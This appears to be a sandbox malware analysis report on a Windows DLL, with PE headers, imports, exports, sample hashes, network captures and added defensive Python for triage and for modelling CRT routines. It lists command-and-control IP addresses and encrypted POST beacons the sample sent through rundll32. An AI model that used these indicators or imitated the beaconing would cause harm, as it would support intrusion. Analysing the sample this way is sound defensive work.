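The two CryptnetUrlCache entries above are what CryptoAPI leaves behind when it refreshes the trusted-root certificate trust list during certificate validation; the MetaData file records the URL that was fetched, which the preview shows as the authrootstl.cab CTL on ctldl.windowsupdate.com, and the Content file is the cabinet itself. Pulling the URL out of the MetaData blob is the quickest way to confirm that such a drop is a side effect of a TLS handshake rather than a payload. The following Python is an added example, not part of the Joe Sandbox report: it recovers the UTF-16LE URL and ETag from a MetaData blob. The header layout of the real file is not parsed (the example relies only on the embedded UTF-16LE strings, which is an assumption), and the sample blob is constructed to mirror the preview above rather than copied from the report.

```python
"""Recover the fetched URL and ETag from a CryptnetUrlCache MetaData entry."""
import re
from typing import List, Optional, Tuple
from urllib.parse import urlparse

# Constructed stand-in for the MetaData blob in the report: an opaque binary
# header, then the UTF-16LE URL, then the UTF-16LE ETag. Only the strings are
# relied upon; the header bytes are filler, not the real on-disk layout.
SAMPLE_METADATA = (
    b"p\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00Y\x00\x00\x00"
    + b"\x00" * 24
    + "http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab".encode("utf-16-le")
    + b"\x00\x00"
    + '"0aa8a15ea6d71:0"'.encode("utf-16-le")
    + b"\x00\x00"
)

# A run of at least eight printable ASCII characters encoded as UTF-16LE.
UTF16_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){8,}")

# Hosts from which Windows fetches the trusted-root CTL (assumption: this list
# is the only one the example treats as a benign CTL source).
KNOWN_CTL_HOSTS = {"ctldl.windowsupdate.com"}


def utf16_strings(blob: bytes) -> List[str]:
    """Extract UTF-16LE printable-ASCII strings from a binary blob."""
    return [m.group().decode("utf-16-le") for m in UTF16_RUN.finditer(blob)]


def extract_cache_entry(blob: bytes) -> Tuple[Optional[str], Optional[str]]:
    """Return (url, etag) from a MetaData blob; either may be None if absent."""
    url: Optional[str] = None
    etag: Optional[str] = None
    for s in utf16_strings(blob):
        if url is None and s.startswith(("http://", "https://")):
            url = s
        elif etag is None and len(s) >= 2 and s[0] == '"' and s[-1] == '"':
            etag = s.strip('"')
    return url, etag


def is_ctl_fetch(url: Optional[str]) -> bool:
    """True when the cached URL is the Windows trusted-root CTL download."""
    if not url:
        return False
    host = urlparse(url).hostname
    return host in KNOWN_CTL_HOSTS and url.lower().endswith("authrootstl.cab")


if __name__ == "__main__":
    fetched_url, fetched_etag = extract_cache_entry(SAMPLE_METADATA)
    print("url:", fetched_url)
    print("etag:", fetched_etag)
    print("benign CTL refresh:", is_ctl_fetch(fetched_url))
```

Run the same extraction over every MetaData file under the user's CryptnetUrlCache directory during a host triage: entries pointing at windowsupdate.com CTL or CRL distribution points are expected noise, while an entry pointing at an unfamiliar host shows that CryptoAPI validated a certificate chain that referenced it, which is worth correlating with the process and the network indicators above.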

Static File Info

General

File type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit): 6.439756820157215
TrID:
• Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
• Generic Win/DOS Executable (2004/3) 0.20%
• DOS Executable Generic (2002/1) 0.20%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: SecuriteInfo.com.Variant.Razy.980776.5008.dll
File size: 1375232 bytes
MD5: 7f1dd5795783f0793caec052daae5b4e
SHA1: 7ffda23921e29ba6ecd911cfe4ccaaba6b8832ca
SHA256: ef94fa9978503a9a126e4f15296c130e039e67636a55acb5b10778e09ee0d1d3
SHA512: d35720f52199ee70669b1e697457ae5495aad022dfbcda41596e7d0a92968ec8eb7ef08680bcfeb079c473c1be3b2a0c2c552a7d2edeec8801e96244123a29fe
SSDEEP: 24576:NnxqsL+DvNdnhMr5Lo6dOGcuQNrSH9d6N9eYWtZgDxxxSPnsqz7puATt5csRbu7B:Ncfk82uAJTI79PswKwuC
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........L..."..."...".Y"...."......."... ..."...'..."...!..."...$...".Y"...."...#..."...-.k."...#..."......."...!...".Rich.."........

File Icon

Icon Hash: 74f0e4ecccdce0e4

Static PE Info

General

Entrypoint: 0x4336b0
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT
Time Stamp: 0x5BBD2F46 [Tue Oct 9 22:44:22 2018 UTC] (a link-time header value that is trivially forged; it predates the Oct 28, 2021 capture by three years and is not evidence of the build date on its own)
TLS Callbacks: (none)
CLR (.Net) Version: (none; native code)
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: ccbe70d6d0d02f6248ca160d6a0bb85b

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
cmp dword ptr [ebp+0Ch], 01h
jne 00007F8C10AEDF27h
call 00007F8C10AEEC57h
mov eax, dword ptr [ebp+10h]
push eax
mov ecx, dword ptr [ebp+0Ch]
push ecx
mov edx, dword ptr [ebp+08h]
push edx
call 00007F8C10AEDD16h
add esp, 0Ch
pop ebp
retn 000Ch
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
mov eax, dword ptr [0054806Ch]
xor edx, edx
mov ecx, 00000020h
div ecx
push edx
mov edx, dword ptr [ebp+08h]
xor edx, dword ptr [0054806Ch]
push edx
call 00007F8C10AEDF64h
add esp, 08h
pop ebp
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
mov eax, dword ptr [0054806Ch]
xor edx, edx
mov ecx, 00000020h
div ecx
mov eax, 00000020h
sub eax, edx
push eax
mov ecx, dword ptr [ebp+08h]
push ecx
call 00007F8C10AEDF33h
add esp, 08h
xor eax, dword ptr [0054806Ch]
pop ebp
ret
int3
int3
int3
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
mov ecx, dword ptr [ebp+0Ch]
ror eax, cl
pop ebp
ret
int3
int3
int3
push ebp
mov ebp, esp
call 00007F8C10AEF2BDh
push eax
call 00007F8C10B2FFC7h
add esp, 04h
pop ebp
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
sub esp, 18h
mov eax, dword ptr [ebp+00h]
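The entry-point preview is Visual C++ run-time start-up code, not logic specific to this sample. The first function compares the `reason` argument at [ebp+0Ch] with 1 (DLL_PROCESS_ATTACH), calls the cookie initialiser only in that case, then pushes the three DllMain arguments and calls the CRT's dispatcher (cdecl callee, hence `add esp, 0Ch`, while the stub itself returns with `retn 000Ch` as stdcall). The next three functions are the CRT's pointer encode/decode helpers: the dword at 0054806Ch is the security cookie; the encoder XORs its argument with the cookie and rotates right by `cookie % 32` (the unoptimised `div ecx` by 20h), the decoder rotates right by `32 - cookie % 32` (a rotate left) and XORs again, and both hand (value, count) to the `ror eax, cl` routine that follows them. The call targets the report prints (00007F8C...) cannot be addresses inside a 32-bit image based at 0x400000, so recognise these routines by structure, not by those numbers. The Python below is an added model of the three helpers, not code from the sample or from Microsoft's CRT; the cookie value used is the well-known 32-bit default that the initialiser replaces at start-up, and the pointer is the Bluewing export address from the Exports table, used only as a realistic 32-bit value.

```python
"""Model of the CRT pointer encode/decode helpers in the entry-point preview.

Added example, not code from the sample or from Microsoft's CRT: it mirrors
the three helpers that follow the DLL entry stub so their behaviour can be
checked. The security cookie is the dword at 0x54806C in the sample;
DEFAULT_COOKIE is the well-known 32-bit MSVC default that the cookie
initialiser replaces at start-up. EXPORT_PTR is the Bluewing export address
from the Exports table, used here only as a realistic 32-bit pointer value.
"""
MASK32 = 0xFFFFFFFF
DEFAULT_COOKIE = 0xBB40E64E   # x86 default security cookie before init
EXPORT_PTR = 0x0049EED0       # Bluewing export address, as a sample pointer


def ror32(value: int, count: int) -> int:
    """`ror eax, cl` on a 32-bit register; the CPU masks the count to 5 bits."""
    count &= 31
    return ((value >> count) | (value << (32 - count))) & MASK32


def encode_pointer(ptr: int, cookie: int) -> int:
    """Second helper: (ptr ^ cookie) rotated right by cookie % 32.

    The `div ecx` by 0x20 in the listing is the unoptimised form of `% 32`;
    the remainder in edx is pushed as the rotate count.
    """
    return ror32(ptr ^ cookie, cookie % 32)


def decode_pointer(enc: int, cookie: int) -> int:
    """Third helper: rotate right by 32 - cookie % 32 (i.e. a rol), then XOR.

    When cookie % 32 == 0 the count becomes 32, which `ror` masks to 0, so
    the round trip still holds; ror32() reproduces that masking.
    """
    return ror32(enc, 32 - cookie % 32) ^ cookie


if __name__ == "__main__":
    enc = encode_pointer(EXPORT_PTR, DEFAULT_COOKIE)
    print(f"encoded   : {enc:#010x}")
    print(f"right key : {decode_pointer(enc, DEFAULT_COOKIE):#010x}")
    # Decoding with any other cookie yields an unrelated value, which is the
    # point of the scheme: stored callbacks are useless without the cookie.
    print(f"wrong key : {decode_pointer(enc, 0xDEADBEEF):#010x}")
```

Because the default cookie is public, pointers encoded before the initialiser runs would be trivially decodable, which is why the stub calls it before anything else on process attach.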

Data Directories

Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x147190         0x6c          .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT          0x1471fc         0x28          .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x0              0x0           -
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0           -
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0           -
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x15c000         0x72b4        .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x143110         0x54          .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0           -
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0           -
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0           -
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x143168         0x40          .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0           -
IMAGE_DIRECTORY_ENTRY_IAT             0xc7000          0x184         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0           -
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0           -
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0           -

The empty SECURITY, TLS and COM_DESCRIPTOR entries match the "Digitally signed: false", "TLS Callbacks: (none)" and native-code fields above; the DLL also carries no resource section.

Sections

Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type                                    Entropy        Characteristics
.text   0x1000           0xc5e2f       0xc6000   False     0.442064689867   data                                         6.47812387605  IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata  0xc7000          0x80aec       0x80c00   False     0.534103837985   data                                         5.52050689399  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data   0x148000         0x13ba0       0x1800    False     0.1875           DOS executable (block device driverpyright)  3.99635070896  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.reloc  0x15c000         0x72b4        0x7400    False     0.710264008621   data                                         6.69742088731  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

No section is both writable and executable, and the .data section's virtual size (0x13ba0) far exceeds its raw size (0x1800): most of it is zero-filled at load time. The "File Type" column is a libmagic guess on raw section bytes and carries no meaning for .data.

Imports

DLL: KERNEL32.dll
Import: GetCurrentDirectoryA, GetTempPathA, GetWindowsDirectoryA, VirtualProtectEx, FindFirstChangeNotificationA, FlushFileBuffers, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, EncodePointer, DecodePointer, SetLastError, InitializeCriticalSectionAndSpinCount, CreateEventW, SwitchToThread, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetSystemTimeAsFileTime, GetTickCount, GetModuleHandleW, GetProcAddress, WideCharToMultiByte, MultiByteToWideChar, GetStringTypeW, CompareStringW, LCMapStringW, GetLocaleInfoW, GetCPInfo, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, RtlUnwind, RaiseException, InterlockedPushEntrySList, InterlockedFlushSList, GetLastError, FreeLibrary, LoadLibraryExW, GetModuleFileNameA, GetModuleFileNameW, GetModuleHandleExW, HeapAlloc, HeapValidate, GetSystemInfo, ExitProcess, GetStdHandle, GetFileType, WriteFile, OutputDebugStringA, OutputDebugStringW, WriteConsoleW, CloseHandle, WaitForSingleObjectEx, CreateThread, SetConsoleCtrlHandler, GetCurrentThread, GetDateFormatW, GetTimeFormatW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, HeapFree, HeapReAlloc, HeapSize, HeapQueryInformation, GetACP, GetProcessHeap, GetTimeZoneInformation, FindClose, FindFirstFileExA, FindFirstFileExW, FindNextFileA, FindNextFileW, IsValidCodePage, GetOEMCP, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetEnvironmentVariableW, SetStdHandle, GetConsoleCP, GetConsoleMode, SetFilePointerEx, CreateFileW

KERNEL32.dll is the only imported module. Apart from VirtualProtectEx, FindFirstChangeNotificationA and the GetCurrentDirectoryA/GetTempPathA/GetWindowsDirectoryA group at the head of the list, the entries are C run-time start-up boilerplate; GetProcAddress and LoadLibraryExW are present, so any further API surface can be resolved at run time without appearing here.

Exports

Name        Ordinal  Address
Bluewing    1        0x49eed0
Earth       2        0x49efd0
Masterjust  3        0x49eb20

All three export addresses lie inside .text (0x401000 to 0x4c6e2f), as does the entry point.

Network Behavior

Network Port Distribution

TCP Packets

Timestamp                             Source Port  Dest Port  Source IP        Dest IP
Oct 28, 2021 05:06:58.434027910 CEST  49760        443        192.168.2.4      192.46.210.220
Oct 28, 2021 05:06:58.434092999 CEST  443          49760      192.46.210.220   192.168.2.4
Oct 28, 2021 05:06:58.434205055 CEST  49760        443        192.168.2.4      192.46.210.220
Oct 28, 2021 05:06:58.470122099 CEST  49760        443        192.168.2.4      192.46.210.220
Oct 28, 2021 05:06:58.470170975 CEST  443          49760      192.46.210.220   192.168.2.4
Oct 28, 2021 05:06:58.995625019 CEST  443          49760      192.46.210.220   192.168.2.4
Oct 28, 2021 05:06:58.995753050 CEST  49760        443        192.168.2.4      192.46.210.220
Oct 28, 2021 05:06:59.300796986 CEST  49760        443        192.168.2.4      192.46.210.220
Oct 28, 2021 05:06:59.300829887 CEST  443          49760      192.46.210.220   192.168.2.4
Oct 28, 2021 05:06:59.301260948 CEST  443          49760      192.46.210.220   192.168.2.4
Oct 28, 2021 05:06:59.301346064 CEST  49760        443        192.168.2.4      192.46.210.220
Oct 28, 2021 05:06:59.303648949 CEST  49760        443        192.168.2.4      192.46.210.220
Oct 28, 2021 05:06:59.303740978 CEST  49760        443        192.168.2.4      192.46.210.220
Oct 28, 2021 05:06:59.303814888 CEST  443          49760      192.46.210.220   192.168.2.4
Oct 28, 2021 05:07:00.014672041 CEST  443          49760      192.46.210.220   192.168.2.4
Oct 28, 2021 05:07:00.014787912 CEST  49760        443        192.168.2.4      192.46.210.220
Oct 28, 2021 05:07:00.014820099 CEST  443          49760      192.46.210.220   192.168.2.4
Oct 28, 2021 05:07:00.014847040 CEST  443          49760      192.46.210.220   192.168.2.4
Oct 28, 2021 05:07:00.014874935 CEST  49760        443        192.168.2.4      192.46.210.220
Oct 28, 2021 05:07:00.014909029 CEST  49760        443        192.168.2.4      192.46.210.220
Oct 28, 2021 05:07:00.026557922 CEST  49760        443        192.168.2.4      192.46.210.220
Oct 28, 2021 05:07:00.026595116 CEST  443          49760      192.46.210.220   192.168.2.4
Oct 28, 2021 05:07:00.127037048 CEST  49772        443        192.168.2.4      192.46.210.220
Oct 28, 2021 05:07:00.127101898 CEST  443          49772      192.46.210.220   192.168.2.4
Oct 28, 2021 05:07:00.127199888 CEST  49772        443        192.168.2.4      192.46.210.220
Oct 28, 2021 05:07:00.141331911 CEST  49772        443        192.168.2.4      192.46.210.220
Oct 28, 2021 05:07:00.141366005 CEST  443          49772      192.46.210.220   192.168.2.4
Oct 28, 2021 05:07:00.196429968 CEST  49773        808        192.168.2.4      143.244.140.214
Oct 28, 2021 05:07:00.356565952 CEST  808          49773      143.244.140.214  192.168.2.4
Oct 28, 2021 05:07:00.356698990 CEST  49773        808        192.168.2.4      143.244.140.214
Oct 28, 2021 05:07:00.357253075 CEST  49773        808        192.168.2.4      143.244.140.214
Oct 28, 2021 05:07:00.516707897 CEST  808          49773      143.244.140.214  192.168.2.4
Oct 28, 2021 05:07:00.518151045 CEST  808          49773      143.244.140.214  192.168.2.4
Oct 28, 2021 05:07:00.518260956 CEST  49773        808        192.168.2.4      143.244.140.214
Oct 28, 2021 05:07:00.630122900 CEST  443          49772      192.46.210.220   192.168.2.4
Oct 28, 2021 05:07:00.630261898 CEST  49772        443        192.168.2.4      192.46.210.220
Oct 28, 2021 05:07:00.870897055 CEST  49772        443        192.168.2.4      192.46.210.220
Oct 28, 2021 05:07:00.870939016 CEST  443          49772      192.46.210.220   192.168.2.4
Oct 28, 2021 05:07:00.871490002 CEST  443          49772      192.46.210.220   192.168.2.4
Oct 28, 2021 05:07:00.871577978 CEST  49772        443        192.168.2.4      192.46.210.220
Oct 28, 2021 05:07:00.874234915 CEST  49772        443        192.168.2.4      192.46.210.220
Oct 28, 2021 05:07:00.874321938 CEST  49772        443        192.168.2.4      192.46.210.220
Oct 28, 2021 05:07:00.874437094 CEST  443          49772      192.46.210.220   192.168.2.4
Oct 28, 2021 05:07:01.563344955 CEST  443          49772      192.46.210.220   192.168.2.4
Oct 28, 2021 05:07:01.563417912 CEST  443          49772      192.46.210.220   192.168.2.4
Oct 28, 2021 05:07:01.563483953 CEST  49772        443        192.168.2.4      192.46.210.220
Oct 28, 2021 05:07:01.563528061 CEST  49772        443        192.168.2.4      192.46.210.220
Oct 28, 2021 05:07:01.568696022 CEST  49772        443        192.168.2.4      192.46.210.220
Oct 28, 2021 05:07:01.568753958 CEST  443          49772      192.46.210.220   192.168.2.4
Oct 28, 2021 05:07:01.759357929 CEST  49784        808        192.168.2.4      143.244.140.214
Oct 28, 2021 05:07:01.930303097 CEST  808          49784      143.244.140.214  192.168.2.4
Oct 28, 2021 05:07:01.930404902 CEST  49784        808        192.168.2.4      143.244.140.214
Oct 28, 2021 05:07:01.932159901 CEST  49784        808        192.168.2.4      143.244.140.214
Oct 28, 2021 05:07:02.067646980 CEST  49773        808        192.168.2.4      143.244.140.214
Oct 28, 2021 05:07:02.102927923 CEST  808          49784      143.244.140.214  192.168.2.4
Oct 28, 2021 05:07:02.104401112 CEST  808          49784      143.244.140.214  192.168.2.4
Oct 28, 2021 05:07:02.104499102 CEST  49784        808        192.168.2.4      143.244.140.214
                                                                                                      Oct 28, 2021 05:07:02.227190018 CEST80849773143.244.140.214192.168.2.4
                                                                                                      Oct 28, 2021 05:07:02.227596998 CEST80849773143.244.140.214192.168.2.4
                                                                                                      Oct 28, 2021 05:07:02.227677107 CEST49773808192.168.2.4143.244.140.214
                                                                                                      Oct 28, 2021 05:07:02.228887081 CEST49773808192.168.2.4143.244.140.214
                                                                                                      Oct 28, 2021 05:07:02.229340076 CEST49773808192.168.2.4143.244.140.214
                                                                                                      Oct 28, 2021 05:07:02.307152987 CEST49784808192.168.2.4143.244.140.214
                                                                                                      Oct 28, 2021 05:07:02.388307095 CEST80849773143.244.140.214192.168.2.4
                                                                                                      Oct 28, 2021 05:07:02.388664007 CEST80849773143.244.140.214192.168.2.4
                                                                                                      Oct 28, 2021 05:07:02.388684988 CEST80849773143.244.140.214192.168.2.4
                                                                                                      Oct 28, 2021 05:07:02.478176117 CEST80849784143.244.140.214192.168.2.4
                                                                                                      Oct 28, 2021 05:07:02.478512049 CEST80849784143.244.140.214192.168.2.4
                                                                                                      Oct 28, 2021 05:07:02.478688002 CEST49784808192.168.2.4143.244.140.214
                                                                                                      Oct 28, 2021 05:07:02.484776974 CEST49784808192.168.2.4143.244.140.214
                                                                                                      Oct 28, 2021 05:07:02.484895945 CEST49784808192.168.2.4143.244.140.214
                                                                                                      Oct 28, 2021 05:07:02.655751944 CEST80849784143.244.140.214192.168.2.4
                                                                                                      Oct 28, 2021 05:07:02.655782938 CEST80849784143.244.140.214192.168.2.4
                                                                                                      Oct 28, 2021 05:07:02.655800104 CEST80849784143.244.140.214192.168.2.4
                                                                                                      Oct 28, 2021 05:07:02.774800062 CEST80849773143.244.140.214192.168.2.4
                                                                                                      Oct 28, 2021 05:07:02.774821997 CEST80849773143.244.140.214192.168.2.4
                                                                                                      Oct 28, 2021 05:07:02.774951935 CEST49773808192.168.2.4143.244.140.214
                                                                                                      Oct 28, 2021 05:07:02.783175945 CEST49773808192.168.2.4143.244.140.214
                                                                                                      Oct 28, 2021 05:07:02.942833900 CEST80849773143.244.140.214192.168.2.4
                                                                                                      Oct 28, 2021 05:07:03.040132999 CEST80849784143.244.140.214192.168.2.4
                                                                                                      Oct 28, 2021 05:07:03.040165901 CEST80849784143.244.140.214192.168.2.4
                                                                                                      Oct 28, 2021 05:07:03.040349960 CEST49784808192.168.2.4143.244.140.214
                                                                                                      Oct 28, 2021 05:07:03.058553934 CEST49784808192.168.2.4143.244.140.214
                                                                                                      Oct 28, 2021 05:07:03.185879946 CEST497896891192.168.2.445.77.0.96
                                                                                                      Oct 28, 2021 05:07:03.229751110 CEST80849784143.244.140.214192.168.2.4
                                                                                                      Oct 28, 2021 05:07:03.261830091 CEST497906891192.168.2.445.77.0.96
                                                                                                      Oct 28, 2021 05:07:03.352541924 CEST68914978945.77.0.96192.168.2.4
                                                                                                      Oct 28, 2021 05:07:03.352672100 CEST497896891192.168.2.445.77.0.96
                                                                                                      Oct 28, 2021 05:07:03.353493929 CEST497896891192.168.2.445.77.0.96
                                                                                                      Oct 28, 2021 05:07:03.427376986 CEST68914979045.77.0.96192.168.2.4
                                                                                                      Oct 28, 2021 05:07:03.429028034 CEST497906891192.168.2.445.77.0.96
                                                                                                      Oct 28, 2021 05:07:03.430043936 CEST497906891192.168.2.445.77.0.96
                                                                                                      Oct 28, 2021 05:07:03.520014048 CEST68914978945.77.0.96192.168.2.4
                                                                                                      Oct 28, 2021 05:07:03.520976067 CEST68914978945.77.0.96192.168.2.4
                                                                                                      Oct 28, 2021 05:07:03.521039009 CEST497896891192.168.2.445.77.0.96
                                                                                                      Oct 28, 2021 05:07:03.529103994 CEST497896891192.168.2.445.77.0.96
                                                                                                      Oct 28, 2021 05:07:03.595565081 CEST68914979045.77.0.96192.168.2.4
                                                                                                      Oct 28, 2021 05:07:03.596302032 CEST68914979045.77.0.96192.168.2.4
                                                                                                      Oct 28, 2021 05:07:03.596414089 CEST497906891192.168.2.445.77.0.96
                                                                                                      Oct 28, 2021 05:07:03.603799105 CEST497906891192.168.2.445.77.0.96

HTTP Request Dependency Graph

• 192.46.210.220

HTTPS Proxied Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49760 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:06:59 UTC | 0 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4865
Connection: Close
Cache-Control: no-cache
2021-10-28 03:06:59 UTC | 0 | OUT | Data Raw: cc b6 10 bf 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
Data Ascii: $SYCkN#@QN`hB.h\-%ynG`3k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
2021-10-28 03:07:00 UTC | 4 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:06:59 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.4 | 49772 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:07:00 UTC | 4 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4853
Connection: Close
Cache-Control: no-cache
2021-10-28 03:07:00 UTC | 5 | OUT | Data Raw: 37 52 40 b0 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
Data Ascii: 7R@$SYCkN#@QN`hB.h\-%ynG`3kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
2021-10-28 03:07:01 UTC | 9 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:07:01 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
10 | 192.168.2.4 | 49825 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:07:22 UTC | 49 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4865
Connection: Close
Cache-Control: no-cache
2021-10-28 03:07:22 UTC | 50 | OUT | Data Raw: cc b6 10 bf 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
Data Ascii: $SYCkN#@QN`hB.h\-%ynG`3k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
2021-10-28 03:07:22 UTC | 59 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:07:22 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
11 | 192.168.2.4 | 49826 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe

